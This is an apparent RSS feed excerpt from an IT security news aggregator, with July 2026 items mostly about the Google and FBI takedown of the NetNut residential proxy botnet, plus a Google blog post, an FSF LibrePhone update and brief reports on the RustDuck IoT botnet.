<item>
<title><![CDATA[NetNut botnet takes a hit. Don’t be part of the next one.]]></title>
<description><![CDATA[Google, the FBI, and other partners have disrupted a residential proxy network built on millions of hijacked devices and used by criminals.]]></description>
<link>https://tsecurity.de/de/3648718/it-security-nachrichten/netnut-botnet-takes-a-hit-dont-be-part-of-the-next-one/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648718/it-security-nachrichten/netnut-botnet-takes-a-hit-dont-be-part-of-the-next-one/</guid>
<pubDate>Mon, 06 Jul 2026 14:24:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google, the FBI, and other partners have disrupted a residential proxy network built on millions of hijacked devices and used by criminals.]]></content:encoded>
</item>
<item>
<title><![CDATA[FSF Shares Update on 'LibrePhone' and New Automated Site Monitoring Tool]]></title>
<description><![CDATA[At the end of 2025, the FSF launched LibrePhone project, which is working to "better understand and reverse-engineer the nonfree blobs used by a great majority of (if not all) system on a chip designs available today." The FSF's summer newsletter shares this update:


We started with researching ...]]></description>
<link>https://tsecurity.de/de/3645758/it-security-nachrichten/fsf-shares-update-on-librephone-and-new-automated-site-monitoring-tool/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645758/it-security-nachrichten/fsf-shares-update-on-librephone-and-new-automated-site-monitoring-tool/</guid>
<pubDate>Sat, 04 Jul 2026 20:54:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[At the end of 2025, the FSF launched LibrePhone project, which is working to "better understand and reverse-engineer the nonfree blobs used by a great majority of (if not all) system on a chip designs available today." The FSF's summer newsletter shares this update:


We started with researching the proprietary files in Android phones supported by the Lineage project, an Android-based volunteer-led mobile phone operating system with much free software already in it. Our current, primary focus is on the radio blobs that control WiFi, Bluetooth, NFC, and cellular communications. 

The software freedom issues with mobile computing have been around for a long time, with the most challenging issue being the baseband/modem firmware that relies heavily on proprietary software. This creates a technical and legal maze that is nearly impossible to break free from, but that doesn't mean we should ever stop working to create free systems. It certainly doesn't mean we shouldn't liberate the software that we know can be free software. Now, half a year into this project, lead developer Rob Savoye has extracted firmware from over 200 Lineage install packages, processed 85GB of files, and imported the results of these analyses into a PostgreSQL database for cross-device comparison... [M]uch of the software and blobs we need to work through are shared across multiple devices; this means even greater strides for mobile phone freedom... 

As insurmountable as it may seem at times, every blob we manage to free up will be progress. The FSF has proven time and time again that it can bring the free software philosophy to life, not just by advocating for it, but by making it so.

 

The bulletin also describes how waves of botnets from "aggressive LLM scrapers, vulnerability scanners, poorly optimized CI/CD servers" inspired the FSF to create a new free-as-in-freedom automated monitoring tool:



In our efforts to combat the botnets, we optimized several detection rules to ban abusive behavior. We found the upper limit of fail2ban and replaced it with reaction, an efficient alternative with our configuration that uses ipset. We also split several monolithic machines into many separate machines so that when a web service is overwhelmed the other functions of the service do not go down with it... We found quite a few ways to respond to and prevent botnet attacks, but still faced a significant related challenge: communicating when a website or service is down... 

Uptime Kuma is a human-readable, automated monitoring addition to our systems... You can check out our recently-launched self-hosted Uptime Kuma instance at https://status.fsf.org/. When you see the page, you will also likely say, "Wow! The FSF and GNU sure do run a ton of services!" and you would be right... If you maintain websites and services, and are looking for a simple way to communicate publicly with your users, consider using Uptime Kuma or another free software solution instead of choosing a proprietary monitoring solution."
 

There's also an article on the state of free-as-in-freedom videogame console emulators.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=FSF+Shares+Update+on+'LibrePhone'+and+New+Automated+Site+Monitoring+Tool%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F04%2F0654252%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F04%2F0654252%2Ffsf-shares-update-on-librephone-and-new-automated-site-monitoring-tool%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/07/04/0654252/fsf-shares-update-on-librephone-and-new-automated-site-monitoring-tool?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[NetNut cracked as Google and FBI target 2 million-device botnet]]></title>
<description><![CDATA[Other residential proxy brands may rely on the same network This article has been indexed from www.theregister.com – Articles Read the original article: NetNut cracked as Google and FBI target 2 million-device botnet
Read more →
The post NetNut cracked as Google and FBI target 2 million-device bo...]]></description>
<link>https://tsecurity.de/de/3643660/it-security-nachrichten/netnut-cracked-as-google-and-fbi-target-2-million-device-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643660/it-security-nachrichten/netnut-cracked-as-google-and-fbi-target-2-million-device-botnet/</guid>
<pubDate>Fri, 03 Jul 2026 15:23:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Other residential proxy brands may rely on the same network This article has been indexed from www.theregister.com – Articles Read the original article: NetNut cracked as Google and FBI target 2 million-device botnet</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/netnut-cracked-as-google-and-fbi-target-2-million-device-botnet/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/netnut-cracked-as-google-and-fbi-target-2-million-device-botnet/">NetNut cracked as Google and FBI target 2 million-device botnet</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-07-03 15h : 5 posts]]></title>
<description><![CDATA[5 posts were published in the last hour 12:37 : Pegasus Spyware Hacked European Parliament Member Investigating Spyware Abuse 12:36 : JADEPUFFER: First End-to-End AI-Driven Ransomware Operation 12:35 : NetNut cracked as Google and FBI target 2 million-device botnet 12:35…
Read more →
The post IT ...]]></description>
<link>https://tsecurity.de/de/3643656/it-security-nachrichten/it-security-news-hourly-summary-2026-07-03-15h-5-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643656/it-security-nachrichten/it-security-news-hourly-summary-2026-07-03-15h-5-posts/</guid>
<pubDate>Fri, 03 Jul 2026 15:23:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>5 posts were published in the last hour 12:37 : Pegasus Spyware Hacked European Parliament Member Investigating Spyware Abuse 12:36 : JADEPUFFER: First End-to-End AI-Driven Ransomware Operation 12:35 : NetNut cracked as Google and FBI target 2 million-device botnet 12:35…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-03-15h-5-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-03-15h-5-posts/">IT Security News Hourly Summary 2026-07-03 15h : 5 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[NetNut cracked as Google and FBI target 2 million-device botnet]]></title>
<description><![CDATA[Other residential proxy brands may rely on the same network]]></description>
<link>https://tsecurity.de/de/3643464/it-nachrichten/netnut-cracked-as-google-and-fbi-target-2-million-device-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643464/it-nachrichten/netnut-cracked-as-google-and-fbi-target-2-million-device-botnet/</guid>
<pubDate>Fri, 03 Jul 2026 14:03:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Other residential proxy brands may rely on the same network]]></content:encoded>
</item>
<item>
<title><![CDATA[Google and FBI Dismantle NetNut Residential Proxy Botnet]]></title>
<description><![CDATA[Google, the FBI and the IRS Criminal Investigation division disrupted NetNut, a residential proxy network built on two million hijacked devices and used by 316 threat clusters in a single week. Google and FBI Dismantle NetNut Residential Proxy Botnet on…
Read more →
The post Google and FBI Disman...]]></description>
<link>https://tsecurity.de/de/3643442/it-security-nachrichten/google-and-fbi-dismantle-netnut-residential-proxy-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643442/it-security-nachrichten/google-and-fbi-dismantle-netnut-residential-proxy-botnet/</guid>
<pubDate>Fri, 03 Jul 2026 13:53:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google, the FBI and the IRS Criminal Investigation division disrupted NetNut, a residential proxy network built on two million hijacked devices and used by 316 threat clusters in a single week. Google and FBI Dismantle NetNut Residential Proxy Botnet on…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/google-and-fbi-dismantle-netnut-residential-proxy-botnet/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/google-and-fbi-dismantle-netnut-residential-proxy-botnet/">Google and FBI Dismantle NetNut Residential Proxy Botnet</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google and FBI Dismantle NetNut Residential Proxy Botnet]]></title>
<description><![CDATA[Google, the FBI and the IRS Criminal Investigation division disrupted NetNut, a residential proxy network built on two million hijacked devices and used by 316 threat clusters in a single week.
Google and FBI Dismantle NetNut Residential Proxy Botnet on Latest Hacking News | Cyber Security News, ...]]></description>
<link>https://tsecurity.de/de/3643298/it-security-nachrichten/google-and-fbi-dismantle-netnut-residential-proxy-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643298/it-security-nachrichten/google-and-fbi-dismantle-netnut-residential-proxy-botnet/</guid>
<pubDate>Fri, 03 Jul 2026 12:53:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google, the FBI and the IRS Criminal Investigation division disrupted NetNut, a residential proxy network built on two million hijacked devices and used by 316 threat clusters in a single week.</p>
<p><a href="https://latesthackingnews.com/2026/07/03/residential-proxy-botnet-netnut-takedown/">Google and FBI Dismantle NetNut Residential Proxy Botnet</a> on <a href="https://latesthackingnews.com/">Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FBI, Google Take Down NetNut Proxy Network Used by Cyber Threat Actors]]></title>
<description><![CDATA[The NetNut proxy network and the ‘Popa’ botnet are known to have infected devices with variants of Mirai DDoS botnets This article has been indexed from www.infosecurity-magazine.com Read the original article: FBI, Google Take Down NetNut Proxy Network Used by…
Read more →
The post FBI, Google Ta...]]></description>
<link>https://tsecurity.de/de/3643232/it-security-nachrichten/fbi-google-take-down-netnut-proxy-network-used-by-cyber-threat-actors/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643232/it-security-nachrichten/fbi-google-take-down-netnut-proxy-network-used-by-cyber-threat-actors/</guid>
<pubDate>Fri, 03 Jul 2026 12:23:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The NetNut proxy network and the ‘Popa’ botnet are known to have infected devices with variants of Mirai DDoS botnets This article has been indexed from www.infosecurity-magazine.com Read the original article: FBI, Google Take Down NetNut Proxy Network Used by…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/fbi-google-take-down-netnut-proxy-network-used-by-cyber-threat-actors/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/fbi-google-take-down-netnut-proxy-network-used-by-cyber-threat-actors/">FBI, Google Take Down NetNut Proxy Network Used by Cyber Threat Actors</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FBI, Google Take Down NetNut Proxy Network Used by Cyber Threat Actors]]></title>
<description><![CDATA[The NetNut proxy network and the ‘Popa’ botnet are known to have infected devices with variants of Mirai DDoS botnets]]></description>
<link>https://tsecurity.de/de/3643171/it-security-nachrichten/fbi-google-take-down-netnut-proxy-network-used-by-cyber-threat-actors/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643171/it-security-nachrichten/fbi-google-take-down-netnut-proxy-network-used-by-cyber-threat-actors/</guid>
<pubDate>Fri, 03 Jul 2026 11:50:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The NetNut proxy network and the ‘Popa’ botnet are known to have infected devices with variants of Mirai DDoS botnets]]></content:encoded>
</item>
<item>
<title><![CDATA[Erster kompletter Ransomware-Angriff durch einen KI-Agent entdeckt]]></title>
<description><![CDATA[Sicherheitsforscher haben erstmals einen vollständig automatisierten Ransomware-Angriff dokumentiert. Was die KI-Anbieter aktuell als Agentisierung bewerben, ist in kriminellen Kreisen also bereits in der Praxis erfolgreich.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3642886/it-security-nachrichten/erster-kompletter-ransomware-angriff-durch-einen-ki-agent-entdeckt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642886/it-security-nachrichten/erster-kompletter-ransomware-angriff-durch-einen-ki-agent-entdeckt/</guid>
<pubDate>Fri, 03 Jul 2026 09:07:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,159745.html"><img hspace="5" border="0" align="left" alt="Sicherheitslücke, Security, Trojaner, Virus, Schadsoftware, Cybersecurity, Botnetz, Botnet" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/84010.jpg"></a>
			Sicherheitsforscher haben erstmals einen vollständig automatisierten Ransomware-Angriff dokumentiert. Was die KI-Anbieter aktuell als Agentisierung bewerben, ist in kriminellen Kreisen also bereits in der Praxis erfolgreich.			(<a href="https://winfuture.de/news,159745.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Disrupts NetNut Residential Proxy Botnet Used for Malware C2 and Password Spray Attacks]]></title>
<description><![CDATA[Google has disrupted the NetNut residential proxy botnet, a large-scale infrastructure widely exploited for malware command-and-control (C2) operations and password spray attacks. This coordinated effort involved the FBI, Lumen, and various industry partners. It was announced by Google’s Threat I...]]></description>
<link>https://tsecurity.de/de/3642731/it-security-nachrichten/google-disrupts-netnut-residential-proxy-botnet-used-for-malware-c2-and-password-spray-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642731/it-security-nachrichten/google-disrupts-netnut-residential-proxy-botnet-used-for-malware-c2-and-password-spray-attacks/</guid>
<pubDate>Fri, 03 Jul 2026 07:08:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google has disrupted the NetNut residential proxy botnet, a large-scale infrastructure widely exploited for malware command-and-control (C2) operations and password spray attacks. This coordinated effort involved the FBI, Lumen, and various industry partners. It was announced by Google’s Threat Intelligence Group (GTIG) on July 3, 2026. This action is part of an ongoing campaign to […]</p>
<p>The post <a href="https://gbhackers.com/google-disrupts-netnut-residential-proxy-botnet/">Google Disrupts NetNut Residential Proxy Botnet Used for Malware C2 and Password Spray Attacks</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Disrupts NetNut Residential Proxy Botnet Used for Malware C2 and Password Spray Attacks]]></title>
<description><![CDATA[Google has disrupted the NetNut residential proxy botnet, a large-scale infrastructure widely exploited for malware command-and-control (C2) operations and password spray attacks. This coordinated effort involved the FBI, Lumen, and various industry partners. It was announced by Google’s Threat I...]]></description>
<link>https://tsecurity.de/de/3642721/it-security-nachrichten/google-disrupts-netnut-residential-proxy-botnet-used-for-malware-c2-and-password-spray-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642721/it-security-nachrichten/google-disrupts-netnut-residential-proxy-botnet-used-for-malware-c2-and-password-spray-attacks/</guid>
<pubDate>Fri, 03 Jul 2026 07:08:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google has disrupted the NetNut residential proxy botnet, a large-scale infrastructure widely exploited for malware command-and-control (C2) operations and password spray attacks. This coordinated effort involved the FBI, Lumen, and various industry partners. It was announced by Google’s Threat Intelligence…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/google-disrupts-netnut-residential-proxy-botnet-used-for-malware-c2-and-password-spray-attacks/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/google-disrupts-netnut-residential-proxy-botnet-used-for-malware-c2-and-password-spray-attacks/">Google Disrupts NetNut Residential Proxy Botnet Used for Malware C2 and Password Spray Attacks</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FBI Seizes NetNut Proxy Platform, Popa Botnet]]></title>
<description><![CDATA[The Federal Bureau of Investigation (FBI) said today it worked with industry partners to seize hundreds of domains associated with NetNut, a sprawling residential proxy service operated by the publicly-traded Israeli company Alarum Technologies [NASDAQ: ALAR]. The action comes roughly…
Read more ...]]></description>
<link>https://tsecurity.de/de/3642219/it-security-nachrichten/fbi-seizes-netnut-proxy-platform-popa-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642219/it-security-nachrichten/fbi-seizes-netnut-proxy-platform-popa-botnet/</guid>
<pubDate>Thu, 02 Jul 2026 22:38:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Federal Bureau of Investigation (FBI) said today it worked with industry partners to seize hundreds of domains associated with NetNut, a sprawling residential proxy service operated by the publicly-traded Israeli company Alarum Technologies [NASDAQ: ALAR]. The action comes roughly…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/fbi-seizes-netnut-proxy-platform-popa-botnet/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/fbi-seizes-netnut-proxy-platform-popa-botnet/">FBI Seizes NetNut Proxy Platform, Popa Botnet</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FBI Seizes NetNut Proxy Platform, Popa Botnet]]></title>
<description><![CDATA[The Federal Bureau of Investigation (FBI) said today it worked with industry partners to seize hundreds of domains associated with NetNut, a sprawling residential proxy service operated by the publicly-traded Israeli company Alarum Technologies [NASDAQ: ALAR]. The action comes roughly two weeks a...]]></description>
<link>https://tsecurity.de/de/3642147/it-security-nachrichten/fbi-seizes-netnut-proxy-platform-popa-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642147/it-security-nachrichten/fbi-seizes-netnut-proxy-platform-popa-botnet/</guid>
<pubDate>Thu, 02 Jul 2026 21:52:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Federal Bureau of Investigation (FBI) said today it worked with industry partners to seize hundreds of domains associated with NetNut, a sprawling residential proxy service operated by the publicly-traded Israeli company Alarum Technologies [NASDAQ: ALAR]. The action comes roughly two weeks after KrebsOnSecurity published findings from multiple security firms connecting NetNut to the Popa botnet, a collection of at least two million devices that have been compromised by malicious software with little or no consent from victims.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google’s Continued Disruption of Malicious Residential Proxy Networks]]></title>
<description><![CDATA[Background
Today, in coordination with the FBI, Lumen, and others, Google took action against the NetNut residential proxy network, also known as Popa. This action builds on our disruption of the IPIDEA proxy network that took place in January 2026, and is a continuation of Google’s objective to ...]]></description>
<link>https://tsecurity.de/de/3641933/it-security-nachrichten/googles-continued-disruption-of-malicious-residential-proxy-networks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641933/it-security-nachrichten/googles-continued-disruption-of-malicious-residential-proxy-networks/</guid>
<pubDate>Thu, 02 Jul 2026 19:38:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><h3><span>Background</span></h3>
<p><span>Today, in coordination with the FBI, Lumen, and others, Google took action against the NetNut residential proxy network, also known as Popa. This action builds on our </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/disrupting-largest-residential-proxy-network"><span>disruption of the IPIDEA proxy network</span></a><span> that took place in January 2026, and is a continuation of Google’s objective to dismantle malicious residential proxy networks.</span></p>
<h3><span>Actions Taken</span></h3>
<p><span>As a part of this disruption we took the following actions:</span></p>
<ol>
<li aria-level="1">
<p role="presentation"><span>Disabled Google accounts and associated Google services used by NetNut for malware command and control (C2), which directly violates Google’s Terms of Service and Acceptable Use Policy. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Shared technical intelligence on NetNut software development kits (SDKs) and backend C2 infrastructure with platform providers, law enforcement, and research firms to help drive ecosystem-wide awareness and enforcement.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>We ensured </span><a href="https://support.google.com/googleplay/answer/2812853?hl=en" rel="noopener" target="_blank"><span>Google Play Protect</span></a><span>, Android’s built-in security protection, automatically warned users and disabled applications known to incorporate NetNut SDKs, and the system will continue to protect users against future install attempts. These efforts to help keep the broader digital ecosystem safe supplement the protections we have to safeguard Android users on certified devices.</span></p>
</li>
</ol>
<p><span>We believe our coordinated actions have caused significant degradation to NetNut’s proxy network and its business operations,</span><strong> reducing the available pool of devices for the proxy operator by millions</strong><span>. In addition to selling access to the network under the NetNut brand, NetNut has a robust reseller program that allows whitelabeling of its network. Google has high confidence that many popular residential proxy brands are in fact whitelabeling the NetNut botnet. While we expect this disruption to have a larger ripple effect across the residential proxy ecosystem, observations after the disruption of IPIDEA proved that individual networks can appear resilient. What we have observed is that when faced with the degradation of their own botnet, proxy operators begin buying capacity from their competitors, effectively becoming a reseller. We recognize that creating a lasting disruption in this fluid ecosystem means we must scale our efforts to target the infrastructure of several interconnected providers. We will continue to observe the composition of the NetNut network and map out how its peers adapt to this action.</span></p>
<h3><span>Why it Matters</span></h3>
<p><span>NetNut is among the largest and most popular residential proxy networks. Estimating the size of residential proxy networks is extremely challenging, but Google Threat Intelligence Group (GTIG) estimates the size of the NetNut network to be at least 2 million devices, distributed across the world. Public reporting by </span><a href="https://krebsonsecurity.com/2026/06/popa-botnet-linked-to-publicly-traded-israeli-firm/" rel="noopener" target="_blank"><span>KrebsOnSecurity</span></a><span> and others, confirmed by Google, illustrates that NetNut populates its botnet by distributing SDKs for devices commonly found in homes, such as smart TVs and streaming boxes. GTIG has also identified NetNut botnet plugin components for large-scale botnets such as Badbox 2.0.</span></p>
<p><span>Residential proxy networks sell the ability to route traffic through IP addresses owned by internet service providers (ISPs), allowing attackers to mask malicious activity by hijacking these IP addresses. A robust residential proxy network requires controlling millions of residential IP addresses to sell to customers for use. To accomplish this, operators need code running on home devices to enroll them into the malicious network as </span><span>exit nodes.</span><span> Home devices become part of proxy networks either because they are pre-installed with malware before purchase or because users unknowingly download applications containing hidden proxy code. This creates serious risks for unsuspecting device owners, as their home IP addresses can be used by attackers as a launchpad for hacking and other unauthorized activities. Consequently, users can have their legitimate traffic flagged as suspicious, or blocked by their service providers.</span></p>
<p><span>In a single week during June 2026, GTIG observed 316 distinct threat clusters using suspected NetNut exit nodes, including cybercriminal and espionage groups. </span><span>These bad actors can use NetNut to mask their origin IP address when accessing victim environments, accessing their own infrastructure, and conducting password spray attacks. Furthermore, when a consumer device becomes an exit node, unauthorized network traffic passes through it. This means bad actors can access other private devices on the same home network, effectively exposing them to Internet threats. Public reports by </span><a href="https://synthient.com/blog/who-are-the-victims-of-residential-proxies" rel="noopener" target="_blank"><span>Synthient</span></a><span>, </span><a href="https://spur.us/blog/residential-proxy-lateral-movement-risk" rel="noopener" target="_blank"><span>Spur</span></a><span>, </span><a href="https://github.com/deepfield/public-research/blob/main/reports/2026-06-18-robovpn-neunative.md" rel="noopener" target="_blank"><span>Nokia Deepfield</span></a><span>, and others have documented the use of NetNut to infect devices with variants of Mirai DDoS botnets.</span></p>
<h3><span>Empowering and Protecting Consumers</span></h3>
<p><span>Consumers should be extremely wary of applications that offer payment in exchange for "unused bandwidth" or "sharing your internet." These applications are primary ways for malicious proxy networks to grow, and could open security vulnerabilities on the device’s home network. We urge users to stick to official app stores, review permissions for third-party VPNs and proxies, and ensure built-in security protections like </span><a href="https://support.google.com/googleplay/answer/2812853?hl=en" rel="noopener" target="_blank"><span>Google Play Protect</span></a><span> are active.</span></p>
<p><span>Consumers should be careful when purchasing connected devices, such as set top boxes, to make sure they are from reputable manufacturers. For example, to help you confirm whether or not a device is built with the official Android TV OS and Play Protect certified, our </span><a href="https://www.android.com/tv/" rel="noopener" target="_blank"><span>Android TV website</span></a><span> </span><span>provides the most up-to-date list of partners. You can also take</span><span> </span><a href="https://support.google.com/googleplay/answer/7165974" rel="noopener" target="_blank"><span>these steps</span></a><span> </span><span>to check if your Android device is Play Protect certified.</span></p>
<h3><span>Future Work</span></h3>
<p><span>As we noted earlier this year, the residential proxy industry appears to be rapidly expanding, and this coordinated disruption is not the end of our work combating malicious residential proxy networks. This industry is deeply connected and operators depend on overlapping botnet networks that are constantly resold. While point-in-time disruptions are a critical tool to protect our users, continued and coordinated effort is needed to reduce malicious proxy networks in the long run. We encourage mobile platforms, ISPs, and other tech platforms to continue sharing intelligence and to take direct action to block malicious C2 infrastructure.</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow]]></title>
<description><![CDATA[RustDuck is a small, evolving DDoS botnet migrating to Rust. It uses advanced encryption, anti-analysis evasion, and exploits known IoT flaws. Since February 2026, researchers at QiAnXin’s XLab have been tracking a new malware family, called RustDuck, that hijacks routers,…
Read more →
The post R...]]></description>
<link>https://tsecurity.de/de/3638349/it-security-nachrichten/rustduck-the-botnet-thats-still-small-but-engineering-like-it-plans-to-grow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638349/it-security-nachrichten/rustduck-the-botnet-thats-still-small-but-engineering-like-it-plans-to-grow/</guid>
<pubDate>Wed, 01 Jul 2026 13:38:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>RustDuck is a small, evolving DDoS botnet migrating to Rust. It uses advanced encryption, anti-analysis evasion, and exploits known IoT flaws. Since February 2026, researchers at QiAnXin’s XLab have been tracking a new malware family, called RustDuck, that hijacks routers,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/rustduck-the-botnet-thats-still-small-but-engineering-like-it-plans-to-grow/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/rustduck-the-botnet-thats-still-small-but-engineering-like-it-plans-to-grow/">RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow]]></title>
<description><![CDATA[RustDuck is a small, evolving DDoS botnet migrating to Rust. It uses advanced encryption, anti-analysis evasion, and exploits known IoT flaws. Since February 2026, researchers at QiAnXin’s XLab have been tracking a new malware family, called RustDuck, that hijacks routers, cameras, Android set-to...]]></description>
<link>https://tsecurity.de/de/3638180/it-security-nachrichten/rustduck-the-botnet-thats-still-small-but-engineering-like-it-plans-to-grow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638180/it-security-nachrichten/rustduck-the-botnet-thats-still-small-but-engineering-like-it-plans-to-grow/</guid>
<pubDate>Wed, 01 Jul 2026 12:38:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[RustDuck is a small, evolving DDoS botnet migrating to Rust. It uses advanced encryption, anti-analysis evasion, and exploits known IoT flaws. Since February 2026, researchers at QiAnXin’s XLab have been tracking a new malware family, called RustDuck, that hijacks routers, cameras, Android set-top boxes, and exposed servers, then uses them to flood targets with junk […]]]></content:encoded>
</item>
<item>
<title><![CDATA[New RustDuck Botnet Targets IoT Devices and Servers With Weak Passwords and RCE Exploits]]></title>
<description><![CDATA[A sophisticated new botnet family dubbed RustDuck emerged in early 2026, leveraging a two-stage Loader and Core architecture to compromise IoT devices, routers, and enterprise servers through brute-force credential attacks and remote code execution vulnerabilities. RustDuck employs a multi-pronge...]]></description>
<link>https://tsecurity.de/de/3637793/it-security-nachrichten/new-rustduck-botnet-targets-iot-devices-and-servers-with-weak-passwords-and-rce-exploits/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637793/it-security-nachrichten/new-rustduck-botnet-targets-iot-devices-and-servers-with-weak-passwords-and-rce-exploits/</guid>
<pubDate>Wed, 01 Jul 2026 10:08:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A sophisticated new botnet family dubbed RustDuck emerged in early 2026, leveraging a two-stage Loader and Core architecture to compromise IoT devices, routers, and enterprise servers through brute-force credential attacks and remote code execution vulnerabilities. RustDuck employs a multi-pronged infection strategy combining weak password attacks against Telnet and SSH services with exploitation of known RCE […]</p>
